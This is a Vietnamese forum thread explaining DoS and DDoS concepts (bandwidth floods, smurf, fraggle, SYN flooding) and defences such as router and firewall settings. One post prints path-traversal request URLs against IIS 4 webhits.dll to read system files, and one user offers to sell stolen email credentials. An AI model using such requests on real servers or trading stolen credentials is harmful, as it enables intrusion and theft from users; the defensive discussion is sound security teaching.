Q viết bài này chỉ là để các bạn có khái niệm (concept) mà thôi, trong bài này Q sẽ không viết về những tools, step by step,và những chi tiết cho việc thực hiện DDoS Attack là vì attack vào bất cứ máy cá nhân hay mạng máy tính nào đều là phạm pháp ( trừ khi tự tấn công máy của mình để học hỏi)
-DDoS ( Distributed Denial of Service) là môt trong nhửng cách tấn công mang máy tính thường được các Hacker sử dụng.Vì nó dễ dàng phá vỡ sự liên lạc của mang vi tính hơn là xâm nhập vào mạng để lấy cắp information.
- Các kiễu của DoS Attack.

- Bandwidth Consumption.
Phần lớn các cuộc tấn công của DoS là dùng cách này.Cơ bản là Hacker sẽ tàn phá đường truyền (bandwidth) của mạng máy tính bằng cách tấn công từ xa (remotely). Dây là 2 cách căn bản (basic) của kiểu tấn công này.
-1
Hacker sẽ làm ngập (flood) sự kết nối của mạng bằng một đường truyền mạnh hơn bằng cách gữi những đòi hỏi (request) tới mạng bị tấn công. thí dụ Hacker sẽ dùng đường truyền T1 (1.544M) hay mạnh hơn để tấn công mạng dùng 56k hoặc 128k.
-2
Hacker sẽ dủng amplify DoS attack, có nghĩa là Hacker sẽ liên kết nhiều mạng có đường truyền yếu để tấn công một mạng mạnh hơn. Thi dụ Hacker chỉ có mạng 56k nhưng muốn tấn công mạng T1, thì Hacker sẽ gữi một request giả mạo mang tên của mạng mà hacker muốn tấn công đến nhiều mạng khác, khi nhiều mạng trả request đó cùng một lúc thì sẽ làm ngập mạng mà Hacker muốn tấn công.
Kiểu tấn công Bandwidth Consumption này rất nguy hiểm vì phần đông những Hacker biết sử dụng cách này đều là giỏi và họ biết cách lừa đảo để che giấu địa chỉ của họ (spoof their source address) làm cho việc truy tìm rất khó khăn. Và họ có thể tấn công ở bất cứ nơi nào mà không cần có đường truyền mạnh, thí dụ Hacker có thể dùng mang 56k ở bất cứ quốc gia nào, giả mạo request của Yahoo để gứi tới Microsoft và AOL khi Microsoft và AOL reply lại cho Yahoo vì đường truyền của MS và AOL quá mạnh nên làm ngập (flood) Yahoo khiến cho Yahoo bị tê liệt, nhưng khi FBI điều tra những source address gửi đến cho Yahoo thì chỉ thấy nhừng address được gửi từ MS và AOL.

Q viết thử một phần nếu các bạn thích thì sẽ viết thêm.

Thân

Hi`nh nhu ca'ch na`y cu~ng de attack server IRC phai ko

Hay lắm không ngờ lại có một bạn gái giỏi như thế này.Vậy mình xin được tiếp tục hén.
Có các cách tấn công sau :
1-Ngập kết nối mạng vì có nhiều bandwidth.
2-Khuếch đại tấn công=cách dùng nhiều điểm để làm ngập kết nối.Vd một người có bandwidth hạn chế có thể dễ dàng tập hợp 100Mbps bandwidth.
3-Chiếm đoạt tài nguyên hệ thống nhu CPU,Memory,...Do đó hệ thống người dùng hợp pháp bị mất tài nguyên dẫn đến tài nguyên vô dụng vì hệ thống ngưng hoạt động.
4-Do lỗi lập trình,vd gửi tín hiệu để xác định xem network stack có xử lý ngoại lệ này không hay sẽ làm toàn bộ hệ thống ngưng hoạt động.
Bắt đầu vào phương pháp tấn công (tôi không chịu trácch nhiệm về mọi hậu quả có thể xảy ra)
Smurf:co 3 thành phần tham gia trong cuộc tấn công này đó là : Ngừơi tấn công , mạng khuếch đại và nạn nhân.Kẻ tấn công sẽ gửi data giả ICMP ECHO đến địa chỉ trên mạng khuếch đại.Sau đó bắt đầu cuộc tàn phá.Nếu người tấn công gửi ICMP đến mạng có 100 hệ thống đáp lại ping truyền kẻ tấn công đã nhân tấn công=từ chối dịch vụ lên 100 lần.
Thôi đén đây để dành lại cho NhuQuynh hen .

Ý Q nói là trước khi Hacker muốn tấn công mạng của Q thì phải scan hay là tim cách xem mang của Q open TCP port nào, rồi mới dùng amplify DDoS attack

Chào bạn
Có rất nhiều cách tấn công vào mạng của bạn.Tôi có thể dùng Fraggle dùng UDP thay cho ICMP.Tôi se gửi gói data giả UDP đến địa chỉ mạng khuyếch đại tiêu biểu la cổng 7 (echo).Hệ thống mạng sẽ kích hoạt echo tra loi máy chủ của bạn va sẽ tạo 1 lưu luuợng rất lớn.Vì nếu kich hoat echo tren he thong nằm trên mạng khuếch đại thì sẽ tạo ra ICMP và bạn vẫn bị chiếm dụng bandwidth.
đối với ICMP echo neu ban muốn loại bỏ được nó thì đối với mỗi he dieu hanh nhu SOLARIS 2.6,2.5.1,2.4... ban phai bổ sung 1 dòng lenh này vào /etc/rc2.d/S69inet :
ndd -set /dev/ip ip_respond_to_echo_broadcast 0
Có như thế thì tôi mới phải dùng cách khác để đối phó với SOLARIS này được nếu không bạn vẫn không thể thắng tôi được.
Về linux,Freebsd,AIX,....là những OS thông dụng nên chắc bạn biết cả rồi tôi không phải nói lại làm gì nữa đúng không ?

....:)
Bạn rất nhớ về lý thuyết nhưng...........ở trên diển đàn này có nhiều bạn mới chưa hiểu biết về nhửng hệ dùng cho máy chủ (server) không phổ biến ở VN như SOLARIS, LINUX, FreeBSD,AVI,Unix ,vvv
Nếu mạng của Q dùng OS Windows thì sao? để chống (prevent) amplify DDoS Attack, Q sẽ dung thêm một Router thí dụ là Cisco Router đặt ở ngoài và tắt (disable) khả năng directed broadcast (xin lỗi chử này Q không biết nói sao cho nó dể hiểu bằng tiếng VN) bằng lệnh (command) sau:
no ip directed-broadcast
Trong những Cisco Router xữ dụng Cisco IOS bản (version) 12 trở lên, khả năng ( disable directed broadcast) được cài ấn định sẵn (enabled by default). Đây là một trong những câu hỏi trong ky thi (exam) CCNP Advanced Cisco Router Configuration 640-403.
Như nhửng gì bạn frankshingdong và Q viết o trên, các bạn có thể làm giảm đi nguy cơ bị tấn công bằng Amplify DDoS nếu hiểu biết và setup an toàn cho mạng của bạn đúng cách.

Q rất cám ơn bạn franshindong đã chỉ dạy thêm cho Q.....;)

Thân

Chào NhuQuynh xin được gửi lời chào thán phục với tất cả tấm lòng.Đây là chủ đề đầu tiên trong diễn đàn gây cho mình cảm giác thích thú va học hỏi thực sự.Mong từ nay trở đi bạn hãy thể hiện khả năng của mình để giúp mọi người nhé.Mình xin đề cử bạn làm Mod của mục này hết lòng.
FrankShinDong.

Đọc qua bài post này tôi xin bầu cử Frankshindong va NhuQuynh làm Mod ở đây------>Trình độ quá cao siêulol

Công nhận là cao siêu, mình chắc chắn là các bạn đã được đào tạo vấn đề này 1 cách chuyên nghiệp!
Mình tin rằng 1 số hacker chưa chắc đã được đào tạo 1 cách chuyên nghiệp như các bạn nhưng họ hoàn toàn có thể hack được dễ dàng (ko kiểm chứng nhalol);)

Hic, mình kô lắm vững kỹ thuật attack như các bạn nhưng vẫn xin tình bày 1 số hiểu biết

DOS hay DDOS đều là kỹ thuật tấn công làm cho hệ thống ngừng cung cấp dịch vụ thường là bằng cách sử dụng hết tài nguyên của hệ thống dẫn đến malfunction thậm chí hang nếu hệ thống đó kô có cơ chế bảo vệ!
Ở đây, bạn Quỳnh (rất khâm phục bạn!!) chỉ đề cập đến Net attack, mặc dù đây là cách tấn công phổ biến nhưng ngoài ra bất cứ attack nào use up system resource thì đều coi là Denial Of Service hết, CPU, RAM, Process... nhưng các cách mà tôi kể trên thwưòng là attack from the inside!

Thân

flooding là một cách tấn công server khá hiệu quả. Tuy nhiên, hiện nay thì khó mà đánh đổ nổi các server lớn lắm. Ly' do là khi họ chưa biết thì hacker có thể xâm nhập nhưng mà dạo này cái "món" này trở nên khá phổ biến nên đối phó cũng không khó cho lắm. :)

Vậy các cao thủ có thể hướng dẫn cách tấn công như thế nào không ạ ? Ví dụ như dùng tool nào va cơ chế hoạt động cũng như phương pháp tấn công ra sao ? Các cao thủ có thể hướng dẫn một cácch dễ hiểu hơn được không ạ ?

Một cách chống DOS rất tự nhiên là chống quá tải
Hoặc là nâng cao load lên, vd, tăng CPU Power, bandwidth...
Hoặc có các cơ chế từ các request yêu cầu nhiều resource

có lẽ các bạn rất thắc mắc vì sao Q không nói rõ cách thức dùng DDos attack....:)
thứ nhất là vì Q không muốn các bạn trở thành Hacker.
thứ hai là vì trên diễn đàn này các bạn có nhiều trình độ khác nhau, Q không thể giải nghĩa chi tiết trong một hoặc hai bài viết được, nếu các bạn không có một căn bản về mạng (Network),về hệ điều hành (operating system), thường các Hacker dùng tools và HĐH Linux. Muốn hiểu rõ các bạn cần phải nắm vửng căn bản của Linux và Windows.

Đây là link về cách xử dụng Tools và cách bảo vệ, nhưng Q nói trước nếu các bạn không có căn bản sẽ không hiểu....:)
http://staff.washington.edu/dittrich/misc/ddos/

Q đã viết một bài về Install VMware để các bạn dể dàng install thêm những HĐH khác trên cùng một máy, Q sẽ viết tiếp cách cài đặt HĐH Linux Redhat trên Windows bằng VMware để các bạn mới làm quen với Linux, và nhửng tools căn bản để bảo vệ mạng ( Hacker thì dùng những tool này để tìm đường tấn công....;) ).

Làm Hacker các bạn sẽ không tìm được việc làm, vì đâu có congty nào đăng báo mướn Hacker.....:), mà nếu bị bắt thì sẽ có tội nửa.

Nhưng nếu làm IT Security thì các bạn sẽ tìm được việc, nhất là xã hội VN đang phát triển trong tương lai gần IT Security sẽ có một vi tri trong ngành CNTT của VN.

Thân

nhuquynh,
Thanks for the link.

Tôi thì cảm thấy khá lạ là tại sao nhiều SV/HS bên VN lại ham học làm "hacker". Quí vị còn nhớ vụ "love bug" không?;) Tại sao FBI có thể tóm được người gừi virus bên Philipines nhỉ ;) ;)

Hi bạn Enchanter

Thắc mắc của bạn về có nhửng người không được đào tạo chuyên nghiệp mà vẩn có thể trở thành Hacker.....:), Q xin được nói rõ cho bạn biết là làm IT Security khó hơn làm Hacker....:) vì phải hiểu rõ các cách tấn công để bảo vệ mạng, Q có đọc báo VN và biết được
thỉnh thoảng có vài Web page bị tấn công....:), điều này khiến bạn nghĩ là không cần chuyên môn cũng có thể trở thành Hacker...:), khi rãnh Q sẽ viết về khái niệm của Web Hacking cho bạn tham khảo.....:)

Thân

Đúng là Hack không khó thậm chí tôi có thể nói là khá đơn giản bởi chúng ta chỉ cần cố gắng tìm được lỗ hổng để leo thang đặc quyền thôi.Cái khó là bảo mật chống lại sự xâm nhập ấy.Nếu bạn là 1 chuyên gia bảo mật thì bạn cũng là 1 hacker tài giỏi vì bạn có thể nắm rõ những bước hành động của Hacker.
Nhân đây cũng nói luôn thể mình đang nắm trong tay tất cả địa chỉ email của người dùng vnn va fpt và có thể nói là passwords của các email đó tuy rằng chúng ở dạng mã hoá nhưng chuyện giải mã là quá đơn giản.Nếu bạn nào muốn có chúng để kinh doanh ( và chỉ vì mục đích kinh doanh mà thôi) thì mail cho mình ,chúng ta sẽ bàn về vấn đề giá cả.Okie ?
FrankShinDong

Kinh doanh quá hén. Hacker có nhiều loại : người thì đi tập làm hacker chỉ vì thích phá hoại, người thì đi làm hacker với mục đích biết để bảo mật v.v.vv Tớ cũng vậy, tớ cũng thích phá nhưng sau mỗi lần deface hoặc flood các website khác thì tớ lại thấy nó tội lỗi làm sao ý. Công người khác làm mà mình lại phá. vì vậy, bây giờ mình không còn phá nữa. Mình chỉ chuyên về lập trình( chình xác là chuyên viết virus). hình như frankshindong chuyên đi làm hộp mail cho người khác phải không ?

Tôi không phải là người đi phá hộp thư yêu cầu bạn dùng từ cho đúng.Tôi đã có dịp vào server của vnn va fpt nên có được số data ấy,thế thôi.Còn chuyện đi phá mail chỉ la trò con nít,tôi không quan tâm.
FrankShinDong.

bác nhìn kỹ lại đi, tớ có nói bác đi phá hộp mail người khác đâu. Ý của tớ là bác chuyên đi làm mail cho người khác hay sao mà có nhiều pass thế. Lần sau đừng hiểu lầm ý người khác nhé

Q xin Iron và Franshingdong đừng tranh luận nữa.....:), theo Q mỗi bạn đều có hiểu biết khá rành về lãnh vực riêng của mình. Tất nhiên trong một forum thường có sự tranh lunậ, đôi khi còn dẫn đến cãi lộn, nhưng nếu mình bình tỉnh một chút thì sẽ trỡ thành bạn bè để học hỏi lẫn nhau. Q mong tất cả đều là bạn để bổ sung cho nhau những kiến thức về IT. Người VN có câu : Học thầy không bằng học bạn.

Thân

Lâu lâu mới đọc được bài thảo luận hay như vậy.

Ý của nhuquynh rất hay, chúng ta hãy chia thành 2 nhóm, 1 chuyên tấn công và 1 bên phòng thủ. Như vậy, chúng ta có thể trao đổi và học hỏi kinh nghiệm lẫn nhau, biết được những sơ hở của nhau để mà khắc phục.

Khi mà đã "tham chiến" thì gần như chúng ta sẽ đem hết sức mình ra để "chiến đấu", và như vậy sẽ biết được sức mình đạt được đến đâu.

Rất mong có nhiều cuộc chiến kiểu này được tiếp tục trong box Security. Như vậy vikhoa mới có hứng để làm tiếp vì có những bài viết hay đáng để đọc.

Hi bạn Neo

Để trà lời bạn Q xin viết theo y nghĩ của Q, có gì không đúng xin bạn chỉ dạy lại cho Q.

Theo Q định nghĩa : Thông minh+Hiểu Biết+Có một ý định = Hacker.
Có lẽ điều đầu tiên của Hacker là sự thông minh của họ, vì có nhiều người tuổi còn rất trẻ chưa được đào tạo ở một trường lớp chuyên nghiệp mà vẩn có thể attack thành công nhiều trường hợp. Để đạt được mục đích, Hacker thường xử dụng nhiều tools và kết hợp với hiểu biết của họ để attack, thí dụ hack vào những trang Web, ngoài nhửng tools căn bản để dò tìm sơ hở, hacker còn biết sửa đối những script attack đã có post lên Net, theo ý mình để attack, nếu không thông minh họ sẽ không làm được.
Đây là một thí dụ của Web Hacking attack vào ASP source code dùng IIS4 vì điểm yếu của file webhits.dll.
Đầu tiên hacker sẽ tìm cánh đọc source của web site bằng file .HTW.
http://192.168.0.1/iissamples/iissamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full.
Sau đó hacker sẽ gắn tên 1 file không có trên system, bằng cách dùng 1 file có hơn 230 khoảng %20 ở giữa default.asp file và .htw.
http://192.168.0.1/default.asp%20%20%20%20%20%20%20%20.........hơn 230 %20.................................%20%20%20%20ht w?CiWebHitsFile=/../../../../../test.txt&CiRestriction=none&CiHiliteType=Full.
rồi hacker sẽ dùng null.htw filename để gửi raw file đến Web browser.
http://192.168.0.1/null.htw?CiWebHitesFile=/../../../../../winnt/repair/setup.log&CiRestriction=none&CiHiliteType=Full.
khi user mở trang Web có địa chỉ 192.168.0.1 thì chỉ thấy nội dung như sau:

"none" in
/../../../../inetpub/wwwroot/default.asp

Welcome to IIS 4.0!

Welcome
learn about
sample
.................................................. ..........................
.................................................. ..........................
Internet Information Service
Windows NT Sever
.........................

Nếu thông minh Hacker sẽ áp dụng thêm thủ thuẫt của họ để đưa nội dung mà họ muốn lên trang Web này.

Còn nói về IT Security.....:) thường các nhân viên IT về phần Admin đều phải biết về security, vì Hacker có rất nhiều loại và khi họ attack thì mỗi người mỗi ý, Hacker có thể tấn công từ bên ngoài và cũng có thể là nhân viên bên trong congty,do dó người IT Admin phải hiễu biết rất rỏ ràng về mạng của họ, phải hiểu biết trên nhiều lãnh vực của computer muốn được như vậy họ phải luôn học hỏi dù rằng đã có các congty về phòng chống Virus, Firewall,Secutity Program,vvv.. phụ giúp họ bằng nhửng phần cứng và mền.
Khi mang bị tấn công họ phải biết cách sửa trong thời gian ngắn nhất ( các bạn nên biết trong 1 công ty lớn nếu mạng bi ngưng trong 1 phút thì sẽ thiêt hại bao nhiêu).
Mục đích của Hacker là tàn phá hoặc lấy đi thông tin. Mà ỏ đời xây dựng thì mới lâu và khó còn đập phá thì rất nhanh. Hacker họ có thể try tấn công bất cứ lúc nào họ chỉ đợi mạng sơ hở là tấn công vói nhiều hình thức khác nhau. Hacker ở bên trong bóng tối.
Còn nhiệm vụ của Admin là phải chống đở và phuc hồi những gì đã bị tàn phá, họ ở ngoài sáng lúc nào cung phải đề phòng ngày hay đêm cung vậy và phải luôn update kiến thức chuyên môn để đối phó với những thủ thuật mói của các hacker. Hacker có thể làm một thời gian rồi nghĩ hoặc bị ở tù, nhưng làm về IT Admin thì phải làm dến lúc về hưu nếu như mình thích và yêu nghề, cũng có nghĩa là họ phải học hỏi cho đến lúc về hưu.

Các bạn có biết là hằng ngày các congty lớn hoặc những mạng quan trọng trong chính quyền ở My phải chịu bao nhiêu lần try to attack vói đủ mọi hình thức không. Và đã có được bao nhiêu lần tấn công gây nghiem trọng cho các mạng......:), nếu Hacker giỏi đến trình độ muốn làm gì thì làm....:) thì bây giờ các bạn không có dịp vào forum này để làm quen với nhau.

Khi các bạn xử dụng những version của hệ Windows NT và Linux thì đầu tiên các bạn phải type password vào để login.....:) đó là Security đó các bạn.

Đây là một phần những gì Q nghĩi,còn các bạn nghĩ sao? nếu tìm hiểu sâu các bạn sẽ tư trả lời được, làm IT Security khó hay làm Hacker khó......:).

Thân

Xin Lổi nhửng lệnh trong phần thí dụ ở trên Q không viết chính xác %100.....:) nếu các bạn thông minh và hiểu biết se doán được ngay.

Cho em hỏi Frankshindong có phải la Frankshindong của CyberArmy không ạ ? Nếu đúng thế thì em xin bái phục cao thủ.Mong anh nhận em làm đệ tử và chỉ dạy thêm cho em nhé.Lúc trước ở Viethacker.net em có nghe nhiều thông tin nói rằng ở vietnam mình có 1 người là Frankshindong đã được ghi tên ở bảng danh dự của cyberarmy và xâm nhập vào hệ thống của HSBC và một số mạng lưới khác.Nếu đúng là anh thì xin anh hãy giúp đỡ cho tụi newbie chúng em nhé.

Bài viết được gửi bởi Neo

.........................................
Chúng ta chẳng làm được gì cả nếu không núp bóng một ai khác. Hack không khó, nhưng viết ra 1 tool để hỗ trợ hack thì đòi hỏi một trình độ nhất định mới làm được.

Ha..... ha......... với câu nói này tôi có thể coi NEO là 1 cao thủ về computer rồi:) :) :) Quả thật, nếu không có những tay "pro" viết ra các tool để hack thì hacker bên VN và của cả thế giới nữa sẽ giảm đi quá bán......;) ;)

Đúng như Neo đã nói , nếu mình chỉ dùng tool của ngườii khác viết ra thì có thể là không giỏi nhưng chắc bạn biet vua hacker KenvinMitnick chứ ?Trong website của mình anh ấy có nói tôi không viết code để thâm nhập và tôi chưa bao giờ viết cho mình một chương trình nhưng tôi hiểu rất rõ cấu trúc của nó và nhiệm vụ của tôi là sửa đổi code có sẵn theo ý mình mà thôi.
Nhân đây cũng nói thêm về bài viết của NHUQUYNH về lỗi ASP trong IIS 4.0 các lỗi đó đã được fix hết rồi va được eEye cung cấp miễn phí,ngoài lỗi trên còn có lỗi dấu chấm động vào dòng lệnh URL va dạng thập lục phân ,hoặc là lỗi thay thế asp ....Các tool để tìm kiếm bugs này cũng được eEye cung cấp miễn phí.Tôi cũng viết 1 tool để tìm các bugs này = c trong GUI Tiếng Việt,nếu cần tôi sẽ post code toàn bộ chương trình lên đây cũng được nhưng tôi không chịu trách nhiệm về bất cứ chuyện gì nhé.
FrankShinDong.

Hi bạn Franshingdong

Q có nói có 1 người giới thiệu bạn với Q....:), bạn đẵ nắm vững nhiều phần trong cách bảo vệ mạng, quả thật người giới thiệu không nói sai....:)
nhưng...để khác phục lổi file webhits.dll , Q không cần dùng bản sủa lổi , Q sẽ chọn master properties của server bị tấn công, chọn Edit cho "WWW Service", click trên Home Directory tab, clik trên nút Configuration trong Application Setting, trong box Application Configuration ,Q click lên .HTW D\winnt\system32\webhits.dll dể highlight và click trên nút Remove. Đơn giản vây thôi.

Cám ơn bạn đã chỉ day thêm cho Q

Như Quỳnh và Frankshindong khá lắm

Do một số người vẫn chưa rõ lắm, xin phép nói căn bản lại 1 chút về DoS.
Đơn giản là dzầy nè, để tạo 1 kết nối TCP cần 3 bước(3-way handshake):
SYN
A -----------------> B
ACK/SYN
A <----------------- B
SYN
A -----------------> B
1. A gửi B yêu cầu kết nối
2. B báo đã nhận (ACK) và yêu cầu A hồi đáp để hoàn thành kết nối(SYN)
3. Nếu A đồng ý (SYN) thì kết nối sẽ được tạo.
Nếu A không trả lời thì kết nối không hoàn thành, ta gọi đó là nửa kết nối (haft-connection).
Nếu số lượng kết nối này vượt quá giới hạn của field điều khiển kết nối thì hệ thống sẽ tự động bỏ các yêu cầu kết nối tới sau cho đến khi số lượng haft-connection giảm đến mức giới hạn (mức backlog).
Sau timeout mà B không nhận được SYN từ A thì sẽ loại bỏ kết nối, nhường chỗ cho các yêu cầu kết nối đến sau.
Như vậy nếu A chỉ gửi đi các packet SYN yêu cầu kết nối mà không quan tâm đến việc nhận SYN/ACK & không trả lời hoàn thành kết nối sẽ dẫn đến haft-connection, nếu haft-connection liên tục bị bỏ sẽ dẫn đến DoS. Cách thức này còn gọi là SYN flooding.
Để viết 1 chương trình thực hiện SYN flooding đòi hỏi phải dùng IP giả (xem thêm về IP http://www.diendantinhoc.com/showthread.php?s=&threadid=1929 ) để xoá dấu vết & thực hiện tấn công hiệu quả hơn.
Như vậy DDoS chỉ làm gián đoạn khả năng cung cấp dịch vụ của hệ thống trong 1 thời gian chứ không nguy hại đến dữ liệu.
Để viết 1 tool phục vụ cho việc SYN Flooding thì ta cần phải tìm hiểu kỹ thêm nữa.
Cheers!

hic công nhận em còn thua kém các bác nhiều.

Hay wá đi thôi.Cám ơn các bạn đã viết bài thảo luận

Còn tôi thì chẳng hiểu gì cả cứ như là vịt nghe sấm....nhưng phải công nhận đây là 1 bài post tuyệt vời.2 đại cao thủ frankshindong đại diện hacker mũ đen va nhuquynh đại diện hacker mũ trắng đã đấu với nhau 1 trận bất phân thắng bại.Mong từ nay về sau sẽ có được nhiều bài post như thế này thì chẳng bao lâu Mục sercurity này sẽ ăn đứt Viethacker.net cho xem.

hix ... chắc tui phải về TP gấp để họp mặt với mí ông wé

Gui ban Iron

Ban đừng nghỉ là thua kém ai, nếu bạn cố gắng học hỏi đúng cách thì Q nghĩ bạn sẽ rất giỏi sau này, con ngưòi không ai sinh ra là giỏi cã, tất cả kiến thức mà 1 con ngưòi có được là do thầy cô, sách vở, bạn bè....điều quan trọng là đam mê và siêng năng thôi.

Thân

that tinh la em rat nguong mo nhu quynh, mong chi co the dem nhung kien thuc minh biet chi bao cho dan em nay...

This is Yuna...

Mọi người chỉ cách DDoS bằng Syc Flood

Thế có ai chỉ cách chống không ? lol . Yuna xin trình bày 2 cách chống bằng các firewall chuyên dụng như Pix, Netscreen, CheckPoint , WatchGuard

Khi bị SynFlood, firewall có 2 cách chống lại . Thứ nhất Firewall sẽ cố gắng đoán số sequencing của dòng Syn Packet stream. Khi đã đoán ra được số sequencing, thì deny traffic đó là điều dể dàng.

Đôi khi, sequencing là random , do đó rất khó đoán được, vì thế , một vài firewall sinh ra chức năng phân luồn CPU. Như Netscreen, thì chỉ <50% công xuất của CPU được dành cho việc sữ lý các SYN packet. Như vậy luôn có >50% công xuất để sử lý các traffic thông thường khác. Tuy nhiên đường truyền vẩn còn bị chiếm, và đây cũng chỉ là hạ sách.

Vài hiểu biết nhỏ...

cac ban oi minh cung vua tham gia vao trang nay theo kien thuc cua minh cung khong la bao cho minh them y kien nha, cac ban da la cao thu roi nhung tai sao cac ban khong hieu mot dieu rang tai sao Microsoft lai ban he dieu hanh MSDos voi gia la 50 trieu dolar vi do la nhung phan cac ban co the tham chieu tat cac mang hay tham chieu tat nhung trong may minh,
vi du nhu co nhung phan tai sao lai bat buoc chugn ta phai dung Dos thi moi thuc thi duoc hong biet cac ban hieu van de do khogn tai sao mang lai can thiet ve dos nhu vay va cac cong ty lon tai sao cac nha quan tri cam cac user khong cho chay dos va giao cho ho mot so quyen vi dos co the khong dang nhap ma van co the vao duoc hong biet cac ban biet cach do khong, toi cung khong biet nua cac ban nghi toi noi dung khong ne
vi du tai sao khi chugn ta cap quyen cho mot thanh vien la readonly khi ho vao dos thi duoc quyen write hoi cac ban do
chi co cong nghe cua phap va my la dung nhieu lenh dos nhat khong tin hom nao cac ban tim mot nguoi phap hay nguoi my biet ranh va mang ban se thay ho se khong bao gio dung windows ma chi dung dos thoi ah vi khi chung ta dung windows thi no se ghi lai mot so thong tin cua cong viec ta lam nen tai sao nhung nguoi co cong viec bao mat va gioi thi ho dung dos

Bài viết được gửi bởi ltt0909
cac ban oi minh cung vua tham gia vao trang nay theo kien thuc cua minh cung khong la bao cho minh them y kien nha, cac ban da la cao thu roi nhung tai sao cac ban khong hieu mot dieu rang tai sao Microsoft lai ban he dieu hanh MSDos voi gia la 50 trieu dolar vi do la nhung phan cac ban co the tham chieu tat cac mang hay tham chieu tat nhung trong may minh,
vi du nhu co nhung phan tai sao lai bat buoc chugn ta phai dung Dos thi moi thuc thi duoc hong biet cac ban hieu van de do khogn tai sao mang lai can thiet ve dos nhu vay va cac cong ty lon tai sao cac nha quan tri cam cac user khong cho chay dos va giao cho ho mot so quyen vi dos co the khong dang nhap ma van co the vao duoc hong biet cac ban biet cach do khong, toi cung khong biet nua cac ban nghi toi noi dung khong ne
vi du tai sao khi chugn ta cap quyen cho mot thanh vien la readonly khi ho vao dos thi duoc quyen write hoi cac ban do
chi co cong nghe cua phap va my la dung nhieu lenh dos nhat khong tin hom nao cac ban tim mot nguoi phap hay nguoi my biet ranh va mang ban se thay ho se khong bao gio dung windows ma chi dung dos thoi ah vi khi chung ta dung windows thi no se ghi lai mot so thong tin cua cong viec ta lam nen tai sao nhung nguoi co cong viec bao mat va gioi thi ho dung dos

Hi,

1 - Bạn nên bỏ dấu, diển đàn đã tích hợp bộ gỏ VNI rồi

2 - Đây là DoS denial of Service, không phải là MS_DOS (^-^)

3 - MS_DOS là một hệ điều hành căn bản nhất, sẽ rất lâu cho đến lúc người ta nói :"bỏ MS_DOS" .

Đừng tranh luận nữa. Nhuquynh,Neo và Frankshindong viết tiếp đi cho anh em nó nhờ với.
Một room và một chủ đề quá hay.

Đúng rồi,mong mọi người tiếp tục post bài để các newbie được học hỏi thêm kinh nghiệm. Mong rằng chủ đề này sẽ có thêm nhiều cao thủ tham gia thảo luận cho sôi nổi :)

Trong các cách DOS/DDOS, có thể nói SYN/ACK DoS la nguy hiểm nhất và khó chặn nhất. Các cách DoS/DDoS khác vẫn có thể hạn chế được bằng firewall.

Sự khác biệt giữa ICMP/UDP và SYN/ACK DoS.

icmp/udp gửi dữ liệu đến server để làm tê liệt bandwidth/cpu của server, thế nhưng, nếu chúng ta có firewall và một router khá tốt + multiline - network thi có thể ngăn chặn được cách dos này.

Cách syn/ack dos là một cách khó chịu và khá nguy hiểm, đặc biệt, nó rất thích hợp cho những hacker có bandwidth thấp như ở Việt Nam.

thật ra, syn/ack không được dùng để tiêu diệt toàn bộ hệ thống, nó chỉ tiêu diệt một service nào đó thôi (irc/http/...)
Một TCP/IP serivce trên một port nào đó quy đinh chỉ chấp nhận cung lúc một số hữu han half connection. khi những half connection đạt đến một ngưỡng nào đó thì service hoàn toan tê liệt. Do đó, bandwidth của bạn không cần phải mạnh hơn mạng của victim cũng có thể kill một service của họ.

Việc phòng chống syn/ack flood cũng khá khó khăn. Bạn có thể thực hiện những điều như vikhoa noi. Tuy nhiên, việc điều chỉnh những thông số đó có thể nói là "very dificult". Nếu thông số đó quá nhạy cảm thì service của bạn sẽ từ chối các kết nối thực, nếu thông số đó quá thấp thi syn/ack flood vẫn còn hiệu lực.

Thật ra, muốn thực hiện một syn/ack attack không khó, chỉ cần bạn có mot *ix box có superuser, một chút kiến thức về C + raw socket là bạn có thể làm được, và vấn đề dấu source ip thì càng dể. Trong raw socket, bạn có thể quy đinh source ip và dest ip tuỳ ý, chỉ cần cho random 1-255 là xong.

Chấm. Hết.



Bài viết được gửi bởi Neo
Do một số người vẫn chưa rõ lắm, xin phép nói căn bản lại 1 chút về DoS.
Đơn giản là dzầy nè, để tạo 1 kết nối TCP cần 3 bước(3-way handshake):
SYN
A -----------------> B
ACK/SYN
A <----------------- B
SYN
A -----------------> B
1. A gửi B yêu cầu kết nối
2. B báo đã nhận (ACK) và yêu cầu A hồi đáp để hoàn thành kết nối(SYN)
3. Nếu A đồng ý (SYN) thì kết nối sẽ được tạo.
Nếu A không trả lời thì kết nối không hoàn thành, ta gọi đó là nửa kết nối (haft-connection).
Nếu số lượng kết nối này vượt quá giới hạn của field điều khiển kết nối thì hệ thống sẽ tự động bỏ các yêu cầu kết nối tới sau cho đến khi số lượng haft-connection giảm đến mức giới hạn (mức backlog).
Sau timeout mà B không nhận được SYN từ A thì sẽ loại bỏ kết nối, nhường chỗ cho các yêu cầu kết nối đến sau.
Như vậy nếu A chỉ gửi đi các packet SYN yêu cầu kết nối mà không quan tâm đến việc nhận SYN/ACK & không trả lời hoàn thành kết nối sẽ dẫn đến haft-connection, nếu haft-connection liên tục bị bỏ sẽ dẫn đến DoS. Cách thức này còn gọi là SYN flooding.
Để viết 1 chương trình thực hiện SYN flooding đòi hỏi phải dùng IP giả (xem thêm về IP http://www.diendantinhoc.com/showthread.php?s=&threadid=1929 ) để xoá dấu vết & thực hiện tấn công hiệu quả hơn.
Như vậy DDoS chỉ làm gián đoạn khả năng cung cấp dịch vụ của hệ thống trong 1 thời gian chứ không nguy hại đến dữ liệu.
Để viết 1 tool phục vụ cho việc SYN Flooding thì ta cần phải tìm hiểu kỹ thêm nữa.
Cheers!

hì,

Anh Applet ơi, nếu dùng *ix box, các đoạn C đó, anh có source đoạn này không ? Trên www.antionline.com/download có khá nhiều đoạn *.c, em down về xem thì cũng chỉ là các đoạn code chương trình DoS thông thường(ICMP,UDP.v.v.), nên phải sửa lại một tý, thêm vào các tính năng như Spoof Source, Fragment bit set, có điều sai tùm lum hết :P, hì hì, anh có source nào đầy đủ hết không ?

Đối với các Syn/AckDoS, hiện nay hầu hết các Firewallm IDS tiên tiến đều có thể ngăn chặn được hết, tốt nửa là khác.
Các Server chạy hệ điều hành Linux or Sun nếu cài hết Patch vào thì cũng chống lại được hết mất cái đó rồi.

